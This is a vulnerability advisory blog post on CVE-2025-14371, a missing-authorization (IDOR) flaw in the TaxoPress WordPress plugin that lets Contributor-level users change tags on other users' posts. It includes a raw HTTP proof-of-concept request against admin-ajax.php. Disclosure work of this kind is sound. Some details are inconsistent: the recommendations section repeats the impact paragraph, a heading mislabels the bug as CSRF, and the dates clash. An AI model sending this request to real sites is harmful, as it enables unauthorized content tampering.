CVE-2025-14371 affects TaxoPress and it breaks a core WordPress safety boundary where a user may have access to an editor feature but should not be able to change content they cannot edit. The vulnerability allows any authenticated user who is permitted to use the TaxoPress AI metabox, typically Contributor or Author and above, to add or remove tags on posts they do not own by supplying a victim post ID. This becomes a direct content integrity issue because tags and other taxonomy terms drive search relevance, internal navigation, feeds, and SEO surfaces, meaning a low privilege account can silently reshape how content is discovered even when the same user cannot open the post editor for the target post. Install base is significant at 50k plus, so multi author environments where Contributors exist are realistic targets rather than edge cases.
| CVE | CVE-2025-14371 |
| Plugin Version | TaxoPress <= 3.41.0 |
| All Time | 5 785 174 |
| Active installations | 50 000+ |
| Publicly Published | January 5, 2025 |
| Last Updated | January 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14371 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags/taxopress-3410-missing-authorization-to-authenticated-contributor-arbitrary-post-tag-modification |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| November 26, 2025 | Plugin testing and vulnerability detection in the TaxoPress have been completed |
| November 26, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 5, 2025 | Registered CVE-2025-14371 |
Discovery of the Vulnerability
The weakness is an object level authorization bypass. The handler validates a TaxoPress AI nonce and checks general metabox permissions, yet it never performs the WordPress standard per object permission check current_user_can( 'edit_post', $post_id ) for the post being modified. In other words, the code proves the caller is allowed to use the AI feature, but it never proves the caller is allowed to modify the specific post referenced by post_id. The vulnerable logic lives in modules/taxopress-ai/classes/TaxoPressAiAjax.php around lines 681 through 797, and the actual mutations occur where terms are inserted and assigned using functions like wp_set_object_terms, wp_remove_object_terms, and wp_insert_term without a guard that binds the action to an authorized post. This is the exact pattern that produces IDOR style horizontal privilege escalation in WordPress plugins.
Understanding of IDOR attack’s
In WordPress, the permission model is intentionally object scoped. A Contributor may create and edit their own drafts, but they cannot alter other authors’ posts unless explicitly granted. Taxonomies are not harmless metadata, they are part of the editorial product. Tags and categories influence archive pages, related content blocks, topic hubs, RSS feeds, and sometimes paid syndication flows, and they can also trigger automation such as newsletters, push notifications, and social publishing rules. When a plugin allows a user to change terms on another user’s post, the attacker can manipulate the site’s information architecture without touching the post body, which often makes the abuse harder to notice. Real world abuse can include pushing competitor content into irrelevant tags, removing a post from a curated topic feed, injecting misleading tags that create reputational harm, or polluting a site’s SEO strategy by attaching spammy terms that degrade topical authority.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-14371, an attacker with Contributor+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/edit.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 140 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Contributor+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=taxopress_ai_add_post_term&nonce=st_admin_localize.ai_nonce_from_profile.php&taxonomy=post_tag&post_id=86&added_tags[0][term_id]=0&added_tags[0][name]=POC____
The security impact is integrity loss with practical business consequences. A malicious Contributor can target a specific high traffic post and attach tags that redirect readers into attacker chosen topic pages, disrupt internal linking signals, and distort analytics that depend on taxonomy grouping. On news and media sites, tags can determine where articles appear on category hubs and homepage modules, so an attacker can quietly alter editorial placement without publishing rights. On e commerce blogs and affiliate sites, tags can drive conversion flows and landing page relevance, so term manipulation can become a subtle sabotage tactic. The risk also compounds when sites use tags to trigger automation, for example pushing posts into newsletters or social queues, because an attacker can induce unexpected distribution or remove content from planned campaigns, all while leaving minimal traces compared to editing the post body.
Recommendations for Improved Security
The security impact is integrity loss with practical business consequences. A malicious Contributor can target a specific high traffic post and attach tags that redirect readers into attacker chosen topic pages, disrupt internal linking signals, and distort analytics that depend on taxonomy grouping. On news and media sites, tags can determine where articles appear on category hubs and homepage modules, so an attacker can quietly alter editorial placement without publishing rights. On e commerce blogs and affiliate sites, tags can drive conversion flows and landing page relevance, so term manipulation can become a subtle sabotage tactic. The risk also compounds when sites use tags to trigger automation, for example pushing posts into newsletters or social queues, because an attacker can induce unexpected distribution or remove content from planned campaigns, all while leaving minimal traces compared to editing the post body.
By taking proactive measures to address IDOR like CVE-2025-14371 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.